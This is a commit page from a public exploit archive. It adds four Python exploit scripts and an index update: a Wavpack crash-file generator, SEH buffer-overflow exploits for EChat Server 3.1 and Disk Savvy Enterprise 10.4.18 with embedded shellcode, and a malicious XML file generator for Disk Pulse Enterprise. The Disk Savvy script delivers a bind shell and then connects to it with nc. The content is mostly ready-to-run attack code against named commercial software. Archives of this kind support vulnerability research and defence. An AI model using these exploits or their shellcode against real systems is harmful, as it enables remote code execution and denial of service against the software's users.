DB: 2018-02-22
4 changes to exploits/shellcodes Wavpack 5.1.0 - Denial of Service utorrent - JSON-RPC Remote Code Execution / Information Disclosure μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH) Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)
This commit is contained in:
parent
b5d3581200
commit
a4f01ec6e4
5 changed files with 251 additions and 1 deletions
44
exploits/multiple/dos/44154.py
Executable file
44
exploits/multiple/dos/44154.py
Executable file
|
@ -0,0 +1,44 @@
|
|||
# Exploit title: Wavpack 5.1.0 - Denial of Service
|
||||
# Date: 20.02.2018
|
||||
# Exploit Author: r4xis
|
||||
# https://github.com/r4xis
|
||||
#
|
||||
# Vendor Homepage: http://www.wavpack.com/
|
||||
# Software Links: http://www.wavpack.com/downloads.html
|
||||
# https://github.com/dbry/WavPack
|
||||
#
|
||||
#
|
||||
# Version: Wavpack 5.1.0
|
||||
# Tested on: Debian 9.3.0 64 bit
|
||||
# Windows 7 32 bit and 64 bit
|
||||
# Windows 8 64 bit
|
||||
#
|
||||
#
|
||||
# CVE: CVE-2018-7254
|
||||
# CVE Details:
|
||||
# https://nvd.nist.gov/vuln/detail/CVE-2018-7254
|
||||
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889274
|
||||
# https://github.com/dbry/WavPack/issues/26
|
||||
|
||||
|
||||
import os
|
||||
|
||||
head = "\x63\x61\x66\x66"
|
||||
version = "\x00\x01"
|
||||
junk1 = "\x00"*(0xa0-6)
|
||||
crash = "\x80"
|
||||
junk2 = "\x00"*100
|
||||
|
||||
f=open("poc.caf", 'w')
|
||||
f.write(head+version+junk1+crash+junk2)
|
||||
f.close()
|
||||
|
||||
os.system("wavpack poc.caf")
|
||||
|
||||
'''
|
||||
Debian gdb output:
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
__memmove_sse2_unaligned_erms ()
|
||||
at ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S:333
|
||||
333 ../sysdeps/x86_64/multiarch/../multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
|
||||
'''
|
65
exploits/windows/remote/44155.py
Executable file
65
exploits/windows/remote/44155.py
Executable file
|
@ -0,0 +1,65 @@
|
|||
# Exploit Author: Juan Sacco <jsacco@exploitpack.com>
|
||||
# Vulnerability found using Exploit Pack v10 - http://exploitpack.com
|
||||
#
|
||||
# Impact:
|
||||
# An attacker could exploit this vulnerability to execute arbitrary code in the
|
||||
# context of the application. Failed exploit attempts will result in adenial-of-service condition.
|
||||
#
|
||||
# Program description:
|
||||
# Easy Chat Server is a easy, fast and affordable way to host and manage your own real-time communication software,
|
||||
# it allows friends/colleagues to chat with you through a Web Browser (IE, Safari, Chrome, Opera etc.)
|
||||
# Vendor page: http://www.echatserver.com/
|
||||
|
||||
import string, sys
|
||||
import socket, httplib
|
||||
import struct
|
||||
|
||||
def exploit():
|
||||
try:
|
||||
junk = '\x41' * 217
|
||||
shortjmp = "\xeb\x08\xcc\xcc" # Jump over SEH
|
||||
seh = struct.pack('<L', 0x100154c5) # ADD ESP,2C # POP ESI # ADD ESP,0C # RETN ** [SSLEAY32.dll] ** | {PAGE_EXECUTE_READ}
|
||||
buffersize = 2775
|
||||
nops = "\x90"
|
||||
# debug = "\xcc\xcc\xcc\xcc"
|
||||
shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
|
||||
"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
|
||||
"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
|
||||
"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
|
||||
"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
|
||||
"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
|
||||
"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
|
||||
"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
|
||||
"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
|
||||
"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
|
||||
"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
|
||||
"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
|
||||
"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
|
||||
"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
|
||||
"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
|
||||
"\x1c\x80")
|
||||
buffer = junk + shortjmp + seh + nops * (buffersize -
|
||||
(len(shellcode))) + shellcode
|
||||
print buffer
|
||||
URL = '/chat.ghp?username=' + buffer + '&password=null&room=1&null=2'
|
||||
conn = httplib.HTTPConnection(host, port)
|
||||
conn.request('GET', URL)
|
||||
conn.close()
|
||||
except Exception as Error:
|
||||
print "[!] Something went wrong!"
|
||||
print Error
|
||||
|
||||
def howtousage():
|
||||
print "[!] Sorry, minimum required arguments: [host] [port]"
|
||||
sys.exit(-1)
|
||||
|
||||
if __name__ == '__main__':
|
||||
print "[*] EChat Server v3.1 CHAT.ghp (UserName)"
|
||||
print "[*] Author: Juan Sacco <jsacco@exploitpack>"
|
||||
|
||||
try:
|
||||
host = sys.argv[1]
|
||||
port = sys.argv[2]
|
||||
except IndexError:
|
||||
howtousage()
|
||||
exploit()
|
92
exploits/windows/remote/44156.py
Executable file
92
exploits/windows/remote/44156.py
Executable file
|
@ -0,0 +1,92 @@
|
|||
# Exploit Title: Disk Savvy Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH
|
||||
# Date: 01/02/2018
|
||||
# Exploit Author: Daniel Teixeira
|
||||
# Vendor Homepage: http://www.disksavvy.com/
|
||||
# Software Link: http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe
|
||||
# Version: 10.4.18
|
||||
# CVE: CVE-2018-6481
|
||||
# Tested on: Windows 7 x86
|
||||
|
||||
|
||||
from struct import pack
|
||||
from os import system
|
||||
from sys import exit
|
||||
from time import sleep
|
||||
import socket
|
||||
|
||||
port = 9124
|
||||
host = "172.16.40.148"
|
||||
|
||||
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode
|
||||
shellcode = ""
|
||||
shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"
|
||||
shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"
|
||||
shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"
|
||||
shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"
|
||||
shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"
|
||||
shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"
|
||||
shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"
|
||||
shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"
|
||||
shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"
|
||||
shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"
|
||||
shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"
|
||||
shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"
|
||||
shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"
|
||||
shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"
|
||||
shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"
|
||||
shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"
|
||||
shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"
|
||||
shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"
|
||||
shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"
|
||||
shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"
|
||||
shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"
|
||||
shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"
|
||||
shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"
|
||||
shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"
|
||||
shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"
|
||||
shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"
|
||||
shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"
|
||||
shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"
|
||||
shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"
|
||||
shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"
|
||||
|
||||
payload = "A" * 124 # offset
|
||||
payload += "\x90\x09\xeb\x05" # jmp over seh retrun value
|
||||
payload += "\x13\x6d\x05\x10" # 0x10056d13 : pop ebx # pop ecx # ret 0x20 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Disk Savvy Enterprise\bin\libspp.dll)
|
||||
|
||||
|
||||
|
||||
payload += "\x90" * 10
|
||||
payload += "\x83\xc4\x64" * 20 # metasm > add esp,100
|
||||
payload += "\xff\xe4" # metasm > jmp esp
|
||||
payload += "\x90" * (1000 - len(payload) - len(shellcode))
|
||||
payload += shellcode
|
||||
|
||||
header = "\x75\x19\xba\xab"
|
||||
header += "\x03\x00\x00\x00"
|
||||
header += "\x00\x40\x00\x00"
|
||||
header += pack('<I', len(payload))
|
||||
header += pack('<I', len(payload))
|
||||
header += pack('<I', ord(payload[-1]))
|
||||
packet = header
|
||||
packet += payload
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
|
||||
try:
|
||||
|
||||
print "[*] Testing connection to tatget %s:%s" %(host,port)
|
||||
s.connect((host, port))
|
||||
|
||||
except:
|
||||
|
||||
print "[-] Unable to communicate to target %s:%s" %(host,port)
|
||||
|
||||
exit()
|
||||
|
||||
s.send(packet)
|
||||
|
||||
print "[*] Payload Sent.."
|
||||
print "[*] Connecting to bind shell %s:4444 .." %host
|
||||
sleep(5)
|
||||
system("nc %s 4444"%host)
|
45
exploits/windows/remote/44157.py
Executable file
45
exploits/windows/remote/44157.py
Executable file
|
@ -0,0 +1,45 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
# Exploit Title: Disk Pulse Enterprise v10.4.18 - 'Import Command' Buffer Overflow (SEH)
|
||||
# Date: 2018-01-22
|
||||
# Exploit Author: Daniel Teixeira
|
||||
# Author Homepage: www.danielteixeira.com
|
||||
# Vendor Homepage: http://www.diskpulse.com
|
||||
# Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v10.4.18.exe
|
||||
# Version: 10.4.16
|
||||
# Tested on: Windows 7 SP1 x86
|
||||
# CVE: CVE-2017-7310
|
||||
|
||||
import os,struct
|
||||
|
||||
#Buffer overflow
|
||||
junk = "A"*1560
|
||||
|
||||
#JMP ESP (QtGui4.dll)
|
||||
jmpesp= struct.pack('<L',0x651bb77a)
|
||||
|
||||
#NOPS
|
||||
nops = "\x90"
|
||||
|
||||
#LEA EAX, [ESP+76]
|
||||
esp = "\x8D\x44\x24\x4C"
|
||||
#JMP ESP
|
||||
jmp = "\xFF\xE0"
|
||||
|
||||
#JMP Short = EB 05
|
||||
nSEH = "\x90\x90\xEB\x05" #Jump short 5
|
||||
#POP POP RET (QtGui4.dll)
|
||||
SEH = struct.pack('<L',0x67033072)
|
||||
|
||||
#CALC.EXE
|
||||
shellcode = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
|
||||
|
||||
#PAYLOAD
|
||||
payload = junk + jmpesp + nops * 16 + esp + jmp + nops * 68 + nSEH + SEH + nops * 10 + shellcode + nops * 5000
|
||||
|
||||
#FILE
|
||||
file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + payload + '\n</classify>'
|
||||
|
||||
f = open('Exploit.xml', 'w')
|
||||
f.write(file)
|
||||
f.close()
|
|
@ -5869,6 +5869,7 @@ id,file,description,date,author,type,platform,port
|
|||
43344,exploits/windows/dos/43344.py,"Sync Breeze 10.2.12 - Denial of Service",2017-12-15,"Manuel García Cárdenas",dos,windows,
|
||||
44146,exploits/windows/dos/44146.cpp,"Microsoft Windows Kernel - 'nt!RtlpCopyLegacyContextX86' Stack Memory Disclosure",2018-02-20,"Google Security Research",dos,windows,
|
||||
44153,exploits/windows/dos/44153.html,"Microsoft Internet Explorer 11 - 'Js::RegexHelper::RegexReplace' Use-After-Free",2018-02-20,"Google Security Research",dos,windows,
|
||||
44154,exploits/multiple/dos/44154.py,"Wavpack 5.1.0 - Denial of Service",2018-02-21,r4xis,dos,multiple,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -16244,7 +16245,10 @@ id,file,description,date,author,type,platform,port
|
|||
43339,exploits/windows/remote/43339.rb,"Dup Scout Enterprise - 'Login' Buffer Overflow (Metasploit)",2017-12-14,Metasploit,remote,windows,
|
||||
43341,exploits/php/remote/43341.rb,"pfSense 2.4.1 - Cross-Site Request Forgery Error Page Clickjacking (Metasploit)",2017-12-14,Metasploit,remote,php,
|
||||
43342,exploits/hardware/remote/43342.txt,"Palo Alto Networks Firewalls - Root Remote Code Execution",2017-12-14,"Philip Pettersson",remote,hardware,
|
||||
44151,exploits/multiple/remote/44151.txt,"utorrent - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,
|
||||
44151,exploits/multiple/remote/44151.txt,"μTorrent (uTorrent) Classic/Web - JSON-RPC Remote Code Execution / Information Disclosure",2018-02-20,"Google Security Research",remote,multiple,
|
||||
44155,exploits/windows/remote/44155.py,"EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow",2018-02-21,"Juan Sacco",remote,windows,
|
||||
44156,exploits/windows/remote/44156.py,"Disk Savvy Enterprise 10.4.18 - Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows,
|
||||
44157,exploits/windows/remote/44157.py,"Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)",2018-02-21,"Daniel Teixeira",remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue